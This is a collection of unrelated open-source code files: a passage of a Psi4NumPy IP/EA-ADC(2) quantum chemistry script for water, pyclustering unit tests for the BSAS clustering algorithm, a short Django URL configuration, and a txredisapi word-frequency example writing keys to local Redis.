<NAME>, <NAME>, <NAME> and <NAME>, J. Chem. Phys., 150, 064108 (2019).
'''
__authors__ = '<NAME>'
__credits__ = ['<NAME>']
__copyright__ = '(c) 2014-2020, The Psi4NumPy Developers'
__license__ = 'BSD-3-Clause'
__date__ = '2018-03-01'
import time
import numpy as np
import psi4
import functools
from adc_helper import davidson
einsum = functools.partial(np.einsum, optimize=True)
# Settings
n_states = 5
tol = 1e-8
# Set the memory and output file
psi4.set_memory('2 GB')
psi4.core.set_output_file('output.dat', False)
# Set molecule and basis
mol = psi4.geometry('''
O
H 1 1.1
H 1 1.1 2 104
symmetry c1
''')
psi4.set_options({
'basis': '6-31g',
'scf_type': 'pk',
'mp2_type': 'conv',
'e_convergence': 1e-10,
'd_convergence': 1e-10,
'freeze_core': 'false'
})
# Perform SCF
print('\nPerforming SCF...')
e_scf, wfn = psi4.energy('SCF', return_wfn=True)
mints = psi4.core.MintsHelper(wfn.basisset())
# Get data from the wavefunction
nocc = wfn.doccpi()[0]
nmo = wfn.nmo()
e_mo = wfn.epsilon_a().np
c_mo = wfn.Ca()
# Get the antisymmetrized spin-orbital integrals (physicist notation)
print('Building integrals...')
eri = mints.mo_spin_eri(c_mo, c_mo).np
# Expand to spin orbitals
nso = nmo * 2
nocc = nocc * 2
nvir = nso - nocc
e_mo = np.repeat(e_mo, 2)
# Build some slices
o = slice(None, nocc)
v = slice(nocc, None)
# Calculate intermediates
e_ia = e_mo[o, None] - e_mo[None, v]
e_ija = e_mo[o, None, None] + e_ia[None]
e_iab = e_ia[:, :, None] - e_mo[None, None, v]
e_ijab = e_ija[:, :, :, None] - e_mo[None, None, None, v]
t2 = eri[o, o, v, v] / e_ijab
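# t2 are the first-order doubles amplitudes,
#   t2[i,j,a,b] = <ij||ab> / (e_i + e_j - e_a - e_b),
# so the MP2 correlation energy below is E(2) = 1/4 * sum_{ijab} <ij||ab> * t2[i,j,a,b].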
# Print the MP2 energy
e_mp2 = einsum('ijab,ijab->', t2, eri[o, o, v, v]) * 0.25
print('RHF total energy: %16.10f' % e_scf)
print('MP2 correlation energy: %16.10f' % e_mp2)
print('MP2 total energy: %16.10f' % (e_scf + e_mp2))
psi4.compare_values(psi4.energy('mp2'), e_mp2 + e_scf, 6, 'MP2 Energy')
# Construct the singles-singles (1h-1h) space (eq A5)
h_hh = np.diag(e_mo[o])
h_hh += einsum('ikab,jkab->ij', t2, eri[o, o, v, v]) * 0.25
h_hh += einsum('jkab,ikab->ij', t2, eri[o, o, v, v]) * 0.25
# Construct the single-singles (1p-1p) space (adapted from eq A5)
h_pp = np.diag(e_mo[v])
h_pp -= einsum('ijac,ijbc->ab', t2, eri[o, o, v, v]) * 0.25
h_pp -= einsum('ijbc,ijac->ab', t2, eri[o, o, v, v]) * 0.25
# Define the operation representing the dot-product of the IP-ADC(2) matrix
# with an arbitrary state vector (eq A3 & A4)
def ip_matvec(y):
y = np.array(y, order='C')
r = np.zeros_like(y)
yi = y[:nocc]
ri = r[:nocc]
yija = y[nocc:].reshape(nocc, nocc, nvir)
rija = r[nocc:].reshape(nocc, nocc, nvir)
ri += np.dot(h_hh, yi)
ri += einsum('ijak,ija->k', eri[o, o, v, o], yija) * np.sqrt(0.5)
rija += einsum('ijak,k->ija', eri[o, o, v, o], yi) * np.sqrt(0.5)
rija += einsum('ija,ija->ija', e_ija, yija)
return r
# Define the operation representing the dot-product of the EA-ADC(2) matrix
# with an arbitrary state vector (adapted from eq A3 & A4)
def ea_matvec(y):
y = np.array(y, order='C')
r = np.zeros_like(y)
ya = y[:nvir]
ra = r[:nvir]
yiab = y[nvir:].reshape(nocc, nvir, nvir)
riab = r[nvir:].reshape(nocc, nvir, nvir)
ra += np.dot(h_pp, ya)
ra += einsum('abic,iab->c', eri[v, v, o, v], yiab) * np.sqrt(0.5)
riab += einsum('abic,c->iab', eri[v, v, o, v], ya) * np.sqrt(0.5)
riab += einsum('iab,iab->iab', -e_iab, yiab)
return r
# Compute the diagonal of the IP-ADC(2) matrix to use as a preconditioner
# for the Davidson algorithm, and to generate the guess vectors
diag = np.concatenate([np.diag(h_hh), e_ija.ravel()])
arg = np.argsort(np.absolute(diag))
guess = np.eye(diag.size)[:, arg[:n_states]]
# Compute the IPs
e_ip, v_ip = davidson(ip_matvec, guess, diag, tol=tol)
# Print the IPs - each should be doubly degenerate
print('\n%2s %16s %16s' % ('#', 'IP (Ha)', 'IP (eV)'))
for i in range(n_states):
print('%2d %16.8f %16.8f' % (i, -e_ip[i], -e_ip[i] * 27.21139664))
print()
# Compute the diagonal of the EA-ADC(2) matrix to use as a preconditioner
# for the Davidson algorithm, and to generate the guess vectors
diag = np.concatenate([np.diag(h_pp), -e_iab.ravel()])
arg = np.argsort(np.absolute(diag))
guess = np.eye(diag.size)[:, arg[:n_states]]
# Compute the EAs
e_ea, v_ea = davidson(ea_matvec, guess, diag, tol=tol)
# Print the states - each should be doubly degenerate
print('\n%2s %16s %16s' % ('#', 'EA (Ha)', 'EA (eV)'))
for i in range(n_states):
print('%2d %16.8f %16.8f' % (i, e_ea[i], e_ea[i] * 27.21139664))
|
pyclustering/cluster/tests/unit/ut_bsas.py | JosephChataignon/pyclustering | 1,013 | 11188651 | """!
@brief Unit-tests for BSAS algorithm.
@authors <NAME> (<EMAIL>)
@date 2014-2020
@copyright BSD-3-Clause
"""
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.bsas_templates import bsas_test_template
from pyclustering.cluster.bsas import bsas
from pyclustering.utils.metric import type_metric, distance_metric
from pyclustering.samples.definitions import SIMPLE_SAMPLES
class bsas_unit_test(unittest.TestCase):
def testClusteringSampleSimple1(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, [5, 5], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10, 1.0, [5, 5], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 10.0, [10], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 1.0, [10], False)
def testClusteringSampleSimple1Euclidean(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, [5, 5], False, metric=distance_metric(type_metric.EUCLIDEAN))
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 10.0, [10], False, metric=distance_metric(type_metric.EUCLIDEAN))
def testClusteringSampleSimple1EuclideanSquare(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, [5, 5], False, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE))
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 10.0, [5, 5], False, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE))
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 100.0, [10], False, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE))
def testClusteringSampleSimple1Manhattan(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, [5, 5], False, metric=distance_metric(type_metric.MANHATTAN))
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 10.0, [10], False, metric=distance_metric(type_metric.MANHATTAN))
def testClusteringSampleSimple1Chebyshev(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, [5, 5], False, metric=distance_metric(type_metric.CHEBYSHEV))
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 10.0, [10], False, metric=distance_metric(type_metric.CHEBYSHEV))
def testClusteringSampleSimple2(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 1.0, [5, 8, 10], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 10.0, [23], False)
def testClusteringSampleSimple3(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, 1.0, [2, 8, 20, 30], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, 2.0, [8, 10, 12, 30], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, 10.0, [60], False)
def testOneDimentionalPoints1(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 1.0, [10, 10], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 10.0, [20], False)
def testOneDimentionalPoints2(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, 1.0, [10, 20], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, 10.0, [30], False)
def testThreeDimentionalPoints(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, 1.0, [10, 10], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, 10.0, [20], False)
def testTheSamePoints1(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 3, 1.0, [5, 5, 5], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 30, 1.0, [5, 5, 5], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 3, 10.0, [15], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 1, 1.0, [15], False)
def testTheSamePoints2(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 3, 1.0, [10, 20], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 3, 10.0, [30], False)
def testVisulizeNoFailure(self):
bsas_test_template.visualizing(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, False)
bsas_test_template.visualizing(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 1.0, False)
bsas_test_template.visualizing(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, 1.0, False)
def test_incorrect_data(self):
self.assertRaises(ValueError, bsas, [], 1, 1.0)
def test_incorrect_amount_clusters(self):
self.assertRaises(ValueError, bsas, [[0], [1], [2]], 0, 1.0)
def test_incorrect_threshold_dissimilarity(self):
self.assertRaises(ValueError, bsas, [[0], [1], [2]], 1, -1.0)
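# These unit tests follow the standard unittest conventions, so they can be run
# directly with, for example (sketch):
#   python -m unittest pyclustering.cluster.tests.unit.ut_bsas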
|
src/users/urls.py | denkasyanov/education-backend | 151 | 11188690 | from django.urls import path
from users.api.views import SelfView
urlpatterns = [
path('me/', SelfView.as_view()),
]
|
examples/wordfreq.py | ShadowJonathan/txredisapi | 104 | 11188708 | <filename>examples/wordfreq.py
#!/usr/bin/env python
# coding: utf-8
from __future__ import print_function
import sys
import txredisapi as redis
from twisted.internet import defer
from twisted.internet import reactor
def wordfreq(file):
try:
f = open(file, 'r')
words = f.read()
f.close()
except Exception as e:
print("Exception: %s" % e)
return None
wf = {}
wlist = words.split()
for b in wlist:
a = b.lower()
if a in wf:
wf[a] = wf[a] + 1
else:
wf[a] = 1
return len(wf), wf
@defer.inlineCallbacks
def main(wordlist):
db = yield redis.ShardedConnection(("localhost:6379", "localhost:6380"))
for k in wordlist:
yield db.set(k, 1)
reactor.stop()
if __name__ == '__main__':
if len(sys.argv) < 2:
print("Usage: wordfreq.py <file_to_count.txt>")
sys.exit(-1)
l, wfl = wordfreq(sys.argv[1])
print("count: %d" % l)
main(wfl.keys())
reactor.run()
|